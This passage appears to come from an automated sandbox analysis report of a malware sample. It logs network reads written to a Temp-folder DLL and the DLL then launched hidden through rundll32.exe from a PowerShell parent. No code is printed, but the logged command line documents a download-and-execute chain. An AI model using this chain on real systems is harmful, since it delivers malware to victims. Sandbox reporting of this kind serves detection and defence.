1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 65536, size_out = 13068 |
|
1 | |
| Inet | Read Response | size = 65536, size_out = 13068 |
|
1 | |
| File | Write | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Tempdebug.dll, size = 13068 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 65536, size_out = 2904 |
|
1 | |
| Inet | Read Response | size = 65536, size_out = 2904 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 65536, size_out = 1452 |
|
1 | |
| Inet | Read Response | size = 65536, size_out = 1452 |
|
1 | |
| File | Write | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Tempdebug.dll, size = 4096 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 65536, size_out = 2904 |
|
1 | |
| Inet | Read Response | size = 65536, size_out = 2904 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 65536, size_out = 65536 |
|
1 | |
| Inet | Read Response | size = 65536, size_out = 65536 |
|
1 | |
| File | Write | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Tempdebug.dll, size = 4096 |
|
1 | |
| File | Write | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Tempdebug.dll, size = 64604 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 52618, size_out = 17228 |
|
1 | |
| Inet | Read Response | size = 52618, size_out = 17228 |
|
1 | |
| File | Write | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Tempdebug.dll, size = 17228 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 35390, size_out = 5808 |
|
1 | |
| Inet | Read Response | size = 35390, size_out = 5808 |
|
1 | |
| File | Write | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Tempdebug.dll, size = 5808 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 29582, size_out = 4356 |
|
1 | |
| Inet | Read Response | size = 29582, size_out = 4356 |
|
1 | |
| File | Write | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Tempdebug.dll, size = 4356 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 25226, size_out = 25226 |
|
1 | |
| Inet | Read Response | size = 25226, size_out = 25226 |
|
1 | |
| File | Write | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Tempdebug.dll, size = 25226 |
|
1 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
7 | |
| File | Create | filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
1 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
2 | |
| File | Create | filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
1 | |
| File | Create | filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
1 | |
| File | Open | filename = STD_ERROR_HANDLE |
|
1 | |
| File | Create | filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
1 | |
| File | Create | filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
1 | |
| File | Create | filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
2 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Create | filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
1 | |
| File | Write | filename = CONOUT$, size = 79 |
|
1 | |
| File | Create | filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
3 | |
| File | Write | filename = CONOUT$, size = 1 |
|
1 | |
| File | Create | filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
1 | |
| File | Create | filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
1 | |
| File | Create | filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
1 | |
| File | Create | filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
3 | |
| File | Write | filename = CONOUT$, size = 4 |
|
1 | |
| File | Create | filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
3 | |
| File | Write | filename = CONOUT$, size = 1 |
|
1 | |
| File | Create | filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
1 | |
| File | Create | filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
1 | |
| File | Create | filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
1 | |
| File | Create | filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
3 | |
| File | Write | filename = CONOUT$, size = 16 |
|
1 | |
| File | Create | filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
3 | |
| File | Write | filename = CONOUT$, size = 1 |
|
1 | |
| File | Create | filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
1 | |
| File | Create | filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
1 | |
| File | Create | filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
1 | |
| File | Create | filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
3 | |
| File | Write | filename = CONOUT$, size = 79 |
|
1 | |
| File | Create | filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
3 | |
| File | Write | filename = CONOUT$, size = 1 |
|
1 | |
| File | Create | filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
1 | |
| File | Create | filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
1 | |
| File | Create | filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
1 | |
| File | Create | filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
3 | |
| File | Write | filename = CONOUT$, size = 79 |
|
1 | |
| File | Create | filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
3 | |
| File | Write | filename = CONOUT$, size = 1 |
|
1 | |
| File | Create | filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
1 | |
| File | Create | filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
1 | |
| File | Create | filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
1 | |
| File | Create | filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
3 | |
| File | Write | filename = CONOUT$, size = 48 |
|
1 | |
| File | Create | filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
3 | |
| File | Write | filename = CONOUT$, size = 1 |
|
1 | |
| File | Create | filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
1 | |
| File | Create | filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
1 | |
| File | Create | filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
1 | |
| File | Create | filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
3 | |
| File | Write | filename = CONOUT$, size = 79 |
|
1 | |
| File | Create | filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
3 | |
| File | Write | filename = CONOUT$, size = 1 |
|
1 | |
| File | Create | filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
1 | |
| File | Create | filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
1 | |
| File | Create | filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
1 | |
| File | Create | filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
3 | |
| File | Write | filename = CONOUT$, size = 28 |
|
1 | |
| File | Create | filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
3 | |
| File | Write | filename = CONOUT$, size = 1 |
|
1 | |
| File | Create | filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
1 | |
| File | Create | filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
1 | |
| File | Create | filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
1 | |
| File | Create | filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
3 | |
| File | Write | filename = CONOUT$, size = 79 |
|
1 | |
| File | Create | filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
3 | |
| File | Write | filename = CONOUT$, size = 1 |
|
1 | |
| File | Create | filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
1 | |
| File | Create | filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
1 | |
| File | Create | filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
1 | |
| File | Create | filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
3 | |
| File | Write | filename = CONOUT$, size = 55 |
|
1 | |
| File | Create | filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
3 | |
| File | Write | filename = CONOUT$, size = 1 |
|
1 | |
| File | Create | filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
1 | |
| File | Create | filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
1 | |
| File | Create | filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
1 | |
| File | Create | filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
3 | |
| File | Write | filename = CONOUT$, size = 1 |
|
1 | |
| File | Create | filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
3 | |
| File | Write | filename = CONOUT$, size = 1 |
|
1 | |
| Environment | Get Environment String | name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC |
|
1 | |
| Environment | Get Environment String | name = PATH, result_out = C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\ |
|
1 | |
| File | Get Info | filename = C:\Windows\system32\rundll32.exe, type = file_attributes |
|
1 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
4 | |
| Environment | Get Environment String | name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC |
|
2 | |
| Process | Create | process_name = "C:\Windows\system32\rundll32.exe" C:\Users\BGC6U8~1\AppData\Local\Tempdebug.dll HOK, os_pid = 0xae4, show_window = SW_HIDE |
|
1 |
| Category | Operation | Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Environment | Get Environment String | name = MshEnableTrace |
|
5 |
| Information | Value |
|---|---|
| ID | #4 |
| File Name | c:\windows\system32\rundll32.exe |
| Command Line | "C:\Windows\system32\rundll32.exe" C:\Users\BGC6U8~1\AppData\Local\Tempdebug.dll HOK |
| Initial Working Directory | C:\Users\BGC6u8Oy yXGxkR\Desktop\ |
| Monitor | Start Time: 00:00:44, Reason: Child Process |
| Unmonitor | End Time: 00:02:15, Reason: Terminated by Timeout |
| Monitor Duration | 00:01:31 |
| Information | Value |
|---|---|
| PID | 0xae4 |
| Parent PID | 0xa50 (c:\windows\system32\windowspowershell\v1.0\powershell.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | F71GWAT\BGC6u8Oy yXGxkR |
| Groups |
|
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
AE8
0x
AF4
0x
AF8
0x
AFC
0x
B00
|
